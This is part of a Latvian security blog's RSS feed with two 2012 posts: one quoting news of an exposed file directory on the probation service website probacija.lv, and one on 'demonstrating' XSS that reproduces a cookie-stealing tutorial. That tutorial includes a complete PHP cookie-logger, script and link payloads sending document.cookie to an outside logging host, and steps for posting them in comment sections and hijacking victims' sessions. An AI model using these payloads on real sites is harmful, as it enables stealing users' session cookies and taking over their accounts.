		<pubDate>Mon, 23 Jan 2012 08:42:26 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[easy hack]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[probacija.lv]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1813</guid>
		<description><![CDATA[Jāpiefiksē vēsturei. Cik sapratu, tad šīs publikācijas mērķis bija noreklamēt testētāju, kuri to darīja bez saskaņošanas. Diez vai tas nostrādā? Es personīgi šādiem tipiem neuzticētu testēšanu. Principā par šādu rīcību prasītos notiesājošs spriedums. http://www.apollo.lv/portal/news/articles/262237 Kā pārliecinājās aģentūra LETA, izmantojot minētās &#8230; <a href="http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/uzlauzta-vienotibas-majaslapa' rel='bookmark' title='Uzlauzta Vienotības mājaslapa'>Uzlauzta Vienotības mājaslapa</a></li>
<li><a href='http://dll.lv/uzlauzta-mezavairogu-majaslapa' rel='bookmark' title='Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.'>Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Jāpiefiksē vēsturei.<br />
Cik sapratu, tad šīs publikācijas mērķis bija noreklamēt testētāju, kuri to darīja bez saskaņošanas. Diez vai tas nostrādā? Es personīgi šādiem tipiem neuzticētu testēšanu.<br />
Principā par šādu rīcību prasītos notiesājošs spriedums. </p>
<p>http://www.apollo.lv/portal/news/articles/262237</p>
<blockquote><p>Kā pārliecinājās aģentūra LETA, izmantojot minētās mājaslapas tehniskās nepilnības, ikvienam interneta lietotājam bija iespējams iegūt informāciju par dienestā strādājošo ierēdņu algām, kā arī viņu personīgos datus.</p>
<p>Izmantojot būtiskus pārkāpumus mājaslapas drošībā, «ir iespējams iegūt un manipulēt ar pilnīgi visu informāciju, kura atrodas uz servera, ieskaitot pašu serveri», norādīja «Influent».</p>
<p>Drošības testētāji esot informējuši par atrasto «caurumu» arī pašu VPD, bet atbildi no tā neesot sagaidījuši.</p>
<p>Adrese uz visiem publiski pieejamajiem VPD failiem, kas augšupielādēti uz servera, bija gluži vienkārša &#8211; «www.probacija.lv/upload».</p>
<p>Tomēr īsi pēc aģentūras LETA ziņas publicēšanas minētais «caurums» tika «aizlāpīts», līdz ar to dati publiskajā vidē vairs nav pieejami.</p>
<p>Vienā no neaizsargātajiem failiem drošības pārkāpumu testētāji esot atraduši dokumentu, kurā redzams, ka par mājaslapas izstrādi no valsts budžeta paprasīti vairāk nekā 1000 lati, lai gan izstrādātājiem samaksāts vien ap 300 latiem.</p>
<p>VPD pārstāvis Imants Mozers aģentūrai LETA sacīja, ka, uzzinot par šo situāciju, dienests sācis to vērtēt. «Tiklīdz būs zināmi notikušā apstākļi un plašāks skaidrojums, arī mēs sniegsim informāciju,» norādīja Mozers, piebilstot, ka pagaidām nav saprotams, kā šāda veida dati varējuši būt pieejami publiskā vidē.</p>
<p>VPD mājaslapa esot izstrādāta 2004.gadā. Arī intranets dienestam izstrādāts sen, bet Mozers nemācēja pateikt konkrētu gadu.</p>
<p>VPD mājaslapa ir izvietota uz SIA «Lattelecom» serveriem.</p>
<p>Mozers piebilda, &#8211; viņa rīcībā nav informācijas, ka drošības testētāji iepriekš būtu ziņojuši VPD par atrasto «caurumu» dienesta mājaslapā. </p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/uzlauzta-vienotibas-majaslapa' rel='bookmark' title='Uzlauzta Vienotības mājaslapa'>Uzlauzta Vienotības mājaslapa</a></li>
<li><a href='http://dll.lv/uzlauzta-mezavairogu-majaslapa' rel='bookmark' title='Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.'>Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kā nodemonstrēt XSS ievainojamību</title>
		<link>http://dll.lv/ka-nodemonstret-xss-ievainojamibu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ka-nodemonstret-xss-ievainojamibu</link>
		<comments>http://dll.lv/ka-nodemonstret-xss-ievainojamibu#comments</comments>
		<pubDate>Sat, 21 Jan 2012 16:02:35 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1804</guid>
		<description><![CDATA[Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma. Otrs veids ir izmantot šo pieeju. Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies &#8230; <a href="http://dll.lv/ka-nodemonstret-xss-ievainojamibu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot <a href="http://hackiteasy.blogspot.com/2011/01/session-hijacking-or-cookie-stealing.html">autora</a> izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.</p>
<p>Otrs veids ir izmantot <a href="http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/">šo</a> pieeju.<br />
<span id="more-1804"></span><br />
Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot <a href="http://jehiah.cz/a/xss-stealing-cookies-101">šo</a> piemēru:</p>
<p>&lt;p&gt;script><br />
new Image().src=&#8221;http://jehiah.com/_sandbox/log.cgi?c=&#8221;+encodeURI(document.cookie);<br />
&lt;p&gt;/script></p>
<blockquote><p>In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim&#8217;s computer (see HTTP cookie theft).</p>
<p>Here we show how you can hack a session using javascript and php.</p>
<p>What is a cookie?</p>
<p>A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.<br />
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.<br />
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.</p>
<p>What can we do after stealing cookie?</p>
<p>Well,as we know web sites authenticate their user&#8217;s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.</p>
<p>This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.</p>
<p>PHP Code:<br />
<!--?php function GetIP() { if (getenv("HTTP_CLIENT_IP") &#038;&#038; strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") &#038;&#038; strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") &#038;&#038; strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) &#038;&#038; $_SERVER['REMOTE_ADDR'] &#038;&#038; strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?--></p>
<p>Save the script as a cookielogger.php on your server.<br />
(You can get any free webhosting easily such as justfree,x10hosting etc..)</p>
<p>Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.</p>
<p>Now for the hack to work we have to inject this piece of javascript into the target&#8217;s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.</p>
<p>The best way is to look for user interactive sites which contain comments or forums.</p>
<p>Post the following code which invokes or activates the cookielogger on your host.</p>
<p>Code:<br />
&lt;p&gt;script type=&#8221;text/javascript&#8221; language=&#8221;Java script&#8221;>// <![CDATA[<br />
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;<br />
// ]]&gt;&lt;p&gt;/script></p>
<p>Your can also trick the victim into clicking a link that activates javascript.<br />
Below is the code which has to be posted.</p>
<p>Code:<br />
&lt;p&gt;a href=&#8221;java script:document.location=&#8217;http://www.yourhost.com/cookielogger.php?cookie=&#8217;+document.cookie;&#8221;>Click here!</a></p>
<p>Clicking an image also can activate the script.For this purpose you can use the below code.</p>
<p>Code:</p>
<p>&lt;p&gt;img src=&#8221;URL OF THE IMAGE&#8221; alt=&#8221;" /></p>
<p>All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver</p>
<p>In the above codes please remove the space in between javascript.</p>
<p>Hijacking the Session:</p>
<p>Now we have cookie,what to do with this..?<br />
Download cookie editor mozilla plugin or you may find other plugins as well.</p>
<p>Go to the target site&#8211;&gt;open cookie editor&#8211;&gt;Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573</p>
<p>Don&#8217;t forget to comment if you like my post.<br />
by hackiteasy</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-nodemonstret-xss-ievainojamibu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

